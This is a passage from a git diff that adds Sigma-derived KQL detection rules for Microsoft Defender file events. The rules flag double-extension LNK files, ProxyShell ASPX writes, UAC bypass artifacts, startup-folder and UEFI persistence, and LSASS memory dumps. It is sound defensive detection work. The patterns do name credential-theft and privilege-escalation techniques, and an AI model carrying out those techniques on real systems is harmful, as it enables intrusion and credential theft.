+// Date: 2022-11-07
+// Level: medium
+// Description: Detects the creation of files with an "LNK" as a second extension. This is sometimes used by malware as a method to abuse the fact that Windows hides the "LNK" extension by default.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.007
+// False Positives:
+// - Some tuning is required for other general purpose directories of third party apps
+
+DeviceFileEvents
+| where ((FolderPath contains ".doc." or FolderPath contains ".docx." or FolderPath contains ".jpg." or FolderPath contains ".pdf." or FolderPath contains ".ppt." or FolderPath contains ".pptx." or FolderPath contains ".xls." or FolderPath contains ".xlsx.") and FolderPath endswith ".lnk") and (not(FolderPath contains "\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\")) and (not(((InitiatingProcessFolderPath endswith "\\excel.exe" and FolderPath contains "\\AppData\\Roaming\\Microsoft\\Excel") or (InitiatingProcessFolderPath endswith "\\powerpnt.exe" and FolderPath contains "\\AppData\\Roaming\\Microsoft\\PowerPoint") or ((InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe") and FolderPath contains "\\AppData\\Roaming\\Microsoft\\Office\\Recent\\") or (InitiatingProcessFolderPath endswith "\\winword.exe" and FolderPath contains "\\AppData\\Roaming\\Microsoft\\Word"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_msexchangemailboxreplication_aspx_write.kql b/KQL/rules/windows/file/file_event/suspicious_msexchangemailboxreplication_aspx_write.kql
new file mode 100644
index 00000000..e945ae3a
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_msexchangemailboxreplication_aspx_write.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious MSExchangeMailboxReplication ASPX Write
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-25
+// Level: high
+// Description: Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1190, attack.persistence, attack.t1505.003
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\MSExchangeMailboxReplication.exe" and (FolderPath endswith ".aspx" or FolderPath endswith ".asp")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_outlook_macro_created.kql b/KQL/rules/windows/file/file_event/suspicious_outlook_macro_created.kql
new file mode 100644
index 00000000..7f5fb2dc
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_outlook_macro_created.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Outlook Macro Created
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-08
+// Level: high
+// Description: Detects the creation of a macro file for Outlook.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.command-and-control, attack.t1137, attack.t1008, attack.t1546
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where FolderPath endswith "\\Microsoft\\Outlook\\VbaProject.OTM" and (not(InitiatingProcessFolderPath endswith "\\outlook.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_procexp152_sys_file_created_in_tmp.kql b/KQL/rules/windows/file/file_event/suspicious_procexp152_sys_file_created_in_tmp.kql
new file mode 100644
index 00000000..f299a847
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_procexp152_sys_file_created_in_tmp.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious PROCEXP152.sys File Created In TMP
+// Author: xknow (@xknow_infosec), xorxes (@xor_xes)
+// Date: 2019-04-08
+// Level: medium
+// Description: Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder.
+// This driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.t1562.001, attack.defense-evasion
+// False Positives:
+// - Other legimate tools using this driver and filename (like Sysinternals). Note - Clever attackers may easily bypass this detection by just renaming the driver filename. Therefore just Medium-level and don't rely on it.
+
+DeviceFileEvents
+| where (FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath endswith "PROCEXP152.sys") and (not((InitiatingProcessFolderPath contains "\\procexp64.exe" or InitiatingProcessFolderPath contains "\\procexp.exe" or InitiatingProcessFolderPath contains "\\procmon64.exe" or InitiatingProcessFolderPath contains "\\procmon.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_scheduled_task_write_to_system32_tasks.kql b/KQL/rules/windows/file/file_event/suspicious_scheduled_task_write_to_system32_tasks.kql
new file mode 100644
index 00000000..42b9d589
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_scheduled_task_write_to_system32_tasks.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Scheduled Task Write to System32 Tasks
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-11-16
+// Level: high
+// Description: Detects the creation of tasks from processes executed from suspicious locations
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath contains "\\AppData\\" or InitiatingProcessFolderPath contains "C:\\PerfLogs" or InitiatingProcessFolderPath contains "\\Windows\\System32\\config\\systemprofile") and FolderPath contains "\\Windows\\System32\\Tasks"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_screensaver_binary_file_creation.kql b/KQL/rules/windows/file/file_event/suspicious_screensaver_binary_file_creation.kql
new file mode 100644
index 00000000..1dbaae77
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_screensaver_binary_file_creation.kql
@@ -0,0 +1,11 @@
+// Title: Suspicious Screensaver Binary File Creation
+// Author: frack113
+// Date: 2021-12-29
+// Level: medium
+// Description: Adversaries may establish persistence by executing malicious content triggered by user inactivity.
+// Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.002
+
+DeviceFileEvents
+| where FolderPath endswith ".scr" and (not(((InitiatingProcessFolderPath endswith "\\Kindle.exe" or InitiatingProcessFolderPath endswith "\\Bin\\ccSvcHst.exe") or (InitiatingProcessFolderPath endswith "\\TiWorker.exe" and FolderPath endswith "\\uwfservicingscr.scr"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_startup_folder_persistence.kql b/KQL/rules/windows/file/file_event/suspicious_startup_folder_persistence.kql new file mode 100644 index 00000000..832de81f --- /dev/null +++ b/KQL/rules/windows/file/file_event/suspicious_startup_folder_persistence.kql @@ -0,0 +1,14 @@ +// Title: Suspicious Startup Folder Persistence +// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2022-08-10 +// Level: high +// Description: Detects the creation of potentially malicious script and executable files in Windows startup folders, which is a common persistence technique used by threat actors. +// These files (.ps1, .vbs, .js, .bat, etc.) are automatically executed when a user logs in, making the Startup folder an attractive target for attackers. +// This technique is frequently observed in malvertising campaigns and malware distribution where attackers attempt to maintain long-term access to compromised systems. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.t1204.002, attack.persistence, attack.t1547.001 +// False Positives: +// - Rare legitimate usage of some of the extensions mentioned in the rule + +DeviceFileEvents +| where FolderPath contains "\\Windows\\Start Menu\\Programs\\Startup\\" and (FolderPath endswith ".bat" or FolderPath endswith ".cmd" or FolderPath endswith ".dll" or FolderPath endswith ".hta" or FolderPath endswith ".jar" or FolderPath endswith ".js" or FolderPath endswith ".jse" or FolderPath endswith ".msi" or FolderPath endswith ".ps1" or FolderPath endswith ".psd1" or FolderPath endswith ".psm1" or FolderPath endswith ".scr" or FolderPath endswith ".url" or FolderPath endswith ".vba" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".wsf") \ No newline at end of file 
diff --git a/KQL/rules/windows/file/file_event/teamviewer_remote_session.kql b/KQL/rules/windows/file/file_event/teamviewer_remote_session.kql new file mode 100644 index 00000000..5a39750e --- /dev/null +++ b/KQL/rules/windows/file/file_event/teamviewer_remote_session.kql @@ -0,0 +1,12 @@ +// Title: TeamViewer Remote Session +// Author: Florian Roth (Nextron Systems) +// Date: 2022-01-30 +// Level: medium +// Description: Detects the creation of log files during a TeamViewer remote session +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Legitimate uses of TeamViewer in an organisation + +DeviceFileEvents +| where (FolderPath endswith "\\TeamViewer\\RemotePrinting\\tvprint.db" or FolderPath endswith "\\TeamViewer\\TVNetwork.log") or (FolderPath contains "\\TeamViewer" and FolderPath contains "_Logfile.log") \ No newline at end of file diff --git a/KQL/rules/windows/file/file_event/uac_bypass_abusing_winsat_path_parsing_file.kql b/KQL/rules/windows/file/file_event/uac_bypass_abusing_winsat_path_parsing_file.kql new file mode 100644 index 00000000..91f5299e --- /dev/null +++ b/KQL/rules/windows/file/file_event/uac_bypass_abusing_winsat_path_parsing_file.kql @@ -0,0 +1,10 @@ +// Title: UAC Bypass Abusing Winsat Path Parsing - File +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-08-30 +// Level: high +// Description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceFileEvents +| where (FolderPath endswith "\\AppData\\Local\\Temp\\system32\\winsat.exe" or FolderPath endswith "\\AppData\\Local\\Temp\\system32\\winmm.dll") and FolderPath startswith "C:\\Users\\" \ No newline at end of file 
diff --git a/KQL/rules/windows/file/file_event/uac_bypass_using_consent_and_comctl32_file.kql b/KQL/rules/windows/file/file_event/uac_bypass_using_consent_and_comctl32_file.kql new file mode 100644 index 00000000..b1d43d9e --- /dev/null +++ b/KQL/rules/windows/file/file_event/uac_bypass_using_consent_and_comctl32_file.kql @@ -0,0 +1,10 @@ +// Title: UAC Bypass Using Consent and Comctl32 - File +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-08-23 +// Level: high +// Description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceFileEvents +| where FolderPath endswith "\\comctl32.dll" and FolderPath startswith "C:\\Windows\\System32\\consent.exe.@" \ No newline at end of file diff --git a/KQL/rules/windows/file/file_event/uac_bypass_using_eventvwr.kql b/KQL/rules/windows/file/file_event/uac_bypass_using_eventvwr.kql new file mode 100644 index 00000000..7b2d47c9 --- /dev/null +++ b/KQL/rules/windows/file/file_event/uac_bypass_using_eventvwr.kql @@ -0,0 +1,10 @@ +// Title: UAC Bypass Using EventVwr +// Author: Antonio Cocomazzi (idea), Florian Roth (Nextron Systems) +// Date: 2022-04-27 +// Level: high +// Description: Detects the pattern of a UAC bypass using Windows Event Viewer +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation + +DeviceFileEvents +| where (FolderPath endswith "\\Microsoft\\Event Viewer\\RecentViews" or FolderPath endswith "\\Microsoft\\EventV~1\\RecentViews") and (not((InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\"))) \ No newline at end of file 
diff --git a/KQL/rules/windows/file/file_event/uac_bypass_using_idiagnostic_profile_file.kql b/KQL/rules/windows/file/file_event/uac_bypass_using_idiagnostic_profile_file.kql new file mode 100644 index 00000000..a21f5527 --- /dev/null +++ b/KQL/rules/windows/file/file_event/uac_bypass_using_idiagnostic_profile_file.kql @@ -0,0 +1,10 @@ +// Title: UAC Bypass Using IDiagnostic Profile - File +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-03 +// Level: high +// Description: Detects the creation of a file by "dllhost.exe" in System32 directory part of "IDiagnosticProfileUAC" UAC bypass technique +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceFileEvents +| where InitiatingProcessFolderPath endswith "\\DllHost.exe" and FolderPath endswith ".dll" and FolderPath startswith "C:\\Windows\\System32\\" \ No newline at end of file diff --git a/KQL/rules/windows/file/file_event/uac_bypass_using_ieinstal_file.kql b/KQL/rules/windows/file/file_event/uac_bypass_using_ieinstal_file.kql new file mode 100644 index 00000000..c451bb97 --- /dev/null +++ b/KQL/rules/windows/file/file_event/uac_bypass_using_ieinstal_file.kql @@ -0,0 +1,10 @@ +// Title: UAC Bypass Using IEInstal - File +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-08-30 +// Level: high +// Description: Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceFileEvents +| where InitiatingProcessFolderPath =~ "C:\\Program Files\\Internet Explorer\\IEInstal.exe" and FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath endswith "consent.exe" and FolderPath startswith "C:\\Users\\" \ No newline at end of file 
diff --git a/KQL/rules/windows/file/file_event/uac_bypass_using_msconfig_token_modification_file.kql b/KQL/rules/windows/file/file_event/uac_bypass_using_msconfig_token_modification_file.kql new file mode 100644 index 00000000..71051fa8 --- /dev/null +++ b/KQL/rules/windows/file/file_event/uac_bypass_using_msconfig_token_modification_file.kql @@ -0,0 +1,10 @@ +// Title: UAC Bypass Using MSConfig Token Modification - File +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-08-30 +// Level: high +// Description: Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceFileEvents +| where FolderPath endswith "\\AppData\\Local\\Temp\\pkgmgr.exe" and FolderPath startswith "C:\\Users\\" \ No newline at end of file diff --git a/KQL/rules/windows/file/file_event/uac_bypass_using_net_code_profiler_on_mmc.kql b/KQL/rules/windows/file/file_event/uac_bypass_using_net_code_profiler_on_mmc.kql new file mode 100644 index 00000000..52251d21 --- /dev/null +++ b/KQL/rules/windows/file/file_event/uac_bypass_using_net_code_profiler_on_mmc.kql @@ -0,0 +1,10 @@ +// Title: UAC Bypass Using .NET Code Profiler on MMC +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-08-30 +// Level: high +// Description: Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceFileEvents +| where FolderPath endswith "\\AppData\\Local\\Temp\\pe386.dll" and FolderPath startswith "C:\\Users\\" \ No newline at end of file diff --git a/KQL/rules/windows/file/file_event/uac_bypass_using_ntfs_reparse_point_file.kql b/KQL/rules/windows/file/file_event/uac_bypass_using_ntfs_reparse_point_file.kql new file mode 100644 index 00000000..e2bef7cb --- /dev/null 
+++ b/KQL/rules/windows/file/file_event/uac_bypass_using_ntfs_reparse_point_file.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using NTFS Reparse Point - File
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-30
+// Level: high
+// Description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceFileEvents
+| where FolderPath endswith "\\AppData\\Local\\Temp\\api-ms-win-core-kernel32-legacy-l1.DLL" and FolderPath startswith "C:\\Users\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/uac_bypass_using_windows_media_player_file.kql b/KQL/rules/windows/file/file_event/uac_bypass_using_windows_media_player_file.kql
new file mode 100644
index 00000000..de70bf24
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/uac_bypass_using_windows_media_player_file.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using Windows Media Player - File
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-23
+// Level: high
+// Description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceFileEvents
+| where (FolderPath endswith "\\AppData\\Local\\Temp\\OskSupport.dll" and FolderPath startswith "C:\\Users\\") or (InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\DllHost.exe" and FolderPath =~ "C:\\Program Files\\Windows Media Player\\osk.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/uefi_persistence_via_wpbbin_filecreation.kql b/KQL/rules/windows/file/file_event/uefi_persistence_via_wpbbin_filecreation.kql
new file mode 100644
index 00000000..6ebcc586
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/uefi_persistence_via_wpbbin_filecreation.kql
@@ -0,0 +1,12 @@
+// Title: UEFI Persistence Via Wpbbin - FileCreation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-18
+// Level: high
+// Description: Detects creation of a file named "wpbbin" in the "%systemroot%\system32\" directory. Which could be indicative of UEFI based persistence method
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1542.001
+// False Positives:
+// - Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)
+
+DeviceFileEvents
+| where FolderPath =~ "C:\\Windows\\System32\\wpbbin.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/uncommon_file_created_in_office_startup_folder.kql b/KQL/rules/windows/file/file_event/uncommon_file_created_in_office_startup_folder.kql
new file mode 100644
index 00000000..7e0c2a34
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/uncommon_file_created_in_office_startup_folder.kql
@@ -0,0 +1,12 @@ +// Title: Uncommon File Created In Office Startup Folder +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-05 +// Level: high +// Description: Detects the creation of a file with an uncommon extension in an Office application startup folder +// MITRE Tactic: Resource Development +// Tags: attack.resource-development, attack.t1587.001 +// False Positives: +// - False positive might stem from rare extensions used by other Office utilities. + +DeviceFileEvents +| where (((FolderPath contains "\\Microsoft\\Word\\STARTUP" or (FolderPath contains "\\Office" and FolderPath contains "\\Program Files" and FolderPath contains "\\STARTUP")) and (not((FolderPath endswith ".docb" or FolderPath endswith ".docm" or FolderPath endswith ".docx" or FolderPath endswith ".dotm" or FolderPath endswith ".mdb" or FolderPath endswith ".mdw" or FolderPath endswith ".pdf" or FolderPath endswith ".wll" or FolderPath endswith ".wwl")))) or ((FolderPath contains "\\Microsoft\\Excel\\XLSTART" or (FolderPath contains "\\Office" and FolderPath contains "\\Program Files" and FolderPath contains "\\XLSTART")) and (not((FolderPath endswith ".xll" or FolderPath endswith ".xls" or FolderPath endswith ".xlsm" or FolderPath endswith ".xlsx" or FolderPath endswith ".xlt" or FolderPath endswith ".xltm" or FolderPath endswith ".xlw"))))) and (not((((InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft Office\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Microsoft Office\\") and (InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\excel.exe")) or (InitiatingProcessFolderPath contains ":\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" and InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe")))) \ No newline at end of file 
diff --git a/KQL/rules/windows/file/file_event/uncommon_file_creation_by_mysql_daemon_process.kql b/KQL/rules/windows/file/file_event/uncommon_file_creation_by_mysql_daemon_process.kql new file mode 100644 index 00000000..85e794da --- /dev/null +++ b/KQL/rules/windows/file/file_event/uncommon_file_creation_by_mysql_daemon_process.kql @@ -0,0 +1,11 @@ +// Title: Uncommon File Creation By Mysql Daemon Process +// Author: Joseph Kamau +// Date: 2024-05-27 +// Level: high +// Description: Detects the creation of files with scripting or executable extensions by Mysql daemon. +// Which could be an indicator of "User Defined Functions" abuse to download malware. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceFileEvents +| where (InitiatingProcessFolderPath endswith "\\mysqld.exe" or InitiatingProcessFolderPath endswith "\\mysqld-nt.exe") and (FolderPath endswith ".bat" or FolderPath endswith ".dat" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".ps1" or FolderPath endswith ".psm1" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs") \ No newline at end of file diff --git a/KQL/rules/windows/file/file_event/vhd_image_download_via_browser.kql b/KQL/rules/windows/file/file_event/vhd_image_download_via_browser.kql new file mode 100644 index 00000000..9281e3e4 --- /dev/null +++ b/KQL/rules/windows/file/file_event/vhd_image_download_via_browser.kql 
@@ -0,0 +1,13 @@ +// Title: VHD Image Download Via Browser +// Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io' +// Date: 2021-10-25 +// Level: medium +// Description: Detects creation of ".vhd"/".vhdx" files by browser processes. +// Malware can use mountable Virtual Hard Disk ".vhd" files to encapsulate payloads and evade security controls. +// MITRE Tactic: Resource Development +// Tags: attack.resource-development, attack.t1587.001 +// False Positives: +// - Legitimate downloads of ".vhd" files would also trigger this + +DeviceFileEvents +| where (InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\iexplore.exe" or InitiatingProcessFolderPath endswith "\\maxthon.exe" or InitiatingProcessFolderPath endswith "\\MicrosoftEdge.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe" or InitiatingProcessFolderPath endswith "\\opera.exe" or InitiatingProcessFolderPath endswith "\\safari.exe" or InitiatingProcessFolderPath endswith "\\seamonkey.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\whale.exe") and FolderPath contains ".vhd" \ No newline at end of file diff --git a/KQL/rules/windows/file/file_event/visual_studio_code_tunnel_remote_file_creation.kql b/KQL/rules/windows/file/file_event/visual_studio_code_tunnel_remote_file_creation.kql new file mode 100644 index 00000000..4f34b52a --- /dev/null +++ b/KQL/rules/windows/file/file_event/visual_studio_code_tunnel_remote_file_creation.kql 
@@ -0,0 +1,10 @@
+// Title: Visual Studio Code Tunnel Remote File Creation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-10-25
+// Level: medium
+// Description: Detects the creation of file by the "node.exe" process in the ".vscode-server" directory. Could be a sign of remote file creation via VsCode tunnel feature
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath contains "\\servers\\Stable-" and InitiatingProcessFolderPath endswith "\\server\\node.exe" and FolderPath contains "\\.vscode-server\\data\\User\\History\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/vscode_powershell_profile_modification.kql b/KQL/rules/windows/file/file_event/vscode_powershell_profile_modification.kql
new file mode 100644
index 00000000..9f0a8e94
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/vscode_powershell_profile_modification.kql
@@ -0,0 +1,12 @@
+// Title: VsCode Powershell Profile Modification
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-24
+// Level: medium
+// Description: Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.013
+// False Positives:
+// - Legitimate use of the profile by developers or administrators
+
+DeviceFileEvents
+| where FolderPath endswith "\\Microsoft.VSCode_profile.ps1"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/werfault_lsass_process_memory_dump.kql b/KQL/rules/windows/file/file_event/werfault_lsass_process_memory_dump.kql
new file mode 100644
index 00000000..d8b77bc4
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/werfault_lsass_process_memory_dump.kql
@@ -0,0 +1,10 @@
+// Title: WerFault LSASS Process Memory Dump
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-06-27
+// Level: high
+// Description: Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\WerFault.exe" and (FolderPath contains "\\lsass" or FolderPath contains "lsass.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/windows_binaries_write_suspicious_extensions.kql b/KQL/rules/windows/file/file_event/windows_binaries_write_suspicious_extensions.kql
new file mode 100644
index 00000000..2a65cb74
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/windows_binaries_write_suspicious_extensions.kql
@@ -0,0 +1,10 @@ +// Title: Windows Binaries Write Suspicious Extensions +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-12 +// Level: high +// Description: Detects Windows executables that write files with suspicious extensions +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036 + +DeviceFileEvents +| where (((InitiatingProcessFolderPath endswith "\\csrss.exe" or InitiatingProcessFolderPath endswith "\\lsass.exe" or InitiatingProcessFolderPath endswith "\\RuntimeBroker.exe" or InitiatingProcessFolderPath endswith "\\sihost.exe" or InitiatingProcessFolderPath endswith "\\smss.exe" or InitiatingProcessFolderPath endswith "\\wininit.exe" or InitiatingProcessFolderPath endswith "\\winlogon.exe") and (FolderPath endswith ".bat" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".iso" or FolderPath endswith ".ps1" or FolderPath endswith ".txt" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs")) or ((InitiatingProcessFolderPath endswith "\\dllhost.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe") and (FolderPath endswith ".bat" or FolderPath endswith ".hta" or FolderPath endswith ".iso" or FolderPath endswith ".ps1" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs"))) and (not(((InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\dllhost.exe" and (FolderPath contains ":\\Users\\" and FolderPath contains "\\AppData\\Local\\Temp\\__PSScriptPolicyTest_") and FolderPath endswith ".ps1") or (InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe" and (FolderPath contains "C:\\Program Files\\WindowsApps\\Clipchamp" and FolderPath contains ".ps1")) or ((InitiatingProcessFolderPath in~ ("C:\\Windows\\system32\\svchost.exe", "C:\\Windows\\SysWOW64\\svchost.exe")) and FolderPath endswith ".ps1" and (FolderPath startswith "C:\\Program 
Files\\WindowsApps\\Microsoft.PowerShellPreview" or FolderPath startswith "C:\\Program Files (x86)\\WindowsApps\\Microsoft.PowerShellPreview")) or (InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe" and (FolderPath contains "C:\\Windows\\System32\\GroupPolicy\\DataStore\\" and FolderPath contains "\\sysvol\\" and FolderPath contains "\\Policies\\" and FolderPath contains "\\Machine\\Scripts\\Startup\\") and (FolderPath endswith ".ps1" or FolderPath endswith ".bat"))))) \ No newline at end of file diff --git a/KQL/rules/windows/file/file_event/windows_shell_scripting_application_file_write_to_suspicious_folder.kql b/KQL/rules/windows/file/file_event/windows_shell_scripting_application_file_write_to_suspicious_folder.kql new file mode 100644 index 00000000..6b5f1455 --- /dev/null +++ b/KQL/rules/windows/file/file_event/windows_shell_scripting_application_file_write_to_suspicious_folder.kql 
@@ -0,0 +1,10 @@ +// Title: Windows Shell/Scripting Application File Write to Suspicious Folder +// Author: Florian Roth (Nextron Systems) +// Date: 2021-11-20 +// Level: high +// Description: Detects Windows shells and scripting applications that write files to suspicious folders +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 + +DeviceFileEvents +| where ((InitiatingProcessFolderPath endswith "\\bash.exe" or InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\msbuild.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\sh.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") and (FolderPath startswith "C:\\PerfLogs\\" or FolderPath startswith "C:\\Users\\Public\\")) or ((InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\forfiles.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\schtasks.exe" or InitiatingProcessFolderPath endswith "\\scriptrunner.exe" or InitiatingProcessFolderPath endswith "\\wmic.exe") and (FolderPath contains "C:\\PerfLogs\\" or FolderPath contains "C:\\Users\\Public\\" or FolderPath contains "C:\\Windows\\Temp\\")) \ No newline at end of file diff --git a/KQL/rules/windows/file/file_event/windows_terminal_profile_settings_modification_by_uncommon_process.kql b/KQL/rules/windows/file/file_event/windows_terminal_profile_settings_modification_by_uncommon_process.kql new file mode 100644 index 00000000..1a04b77d --- /dev/null +++ b/KQL/rules/windows/file/file_event/windows_terminal_profile_settings_modification_by_uncommon_process.kql 
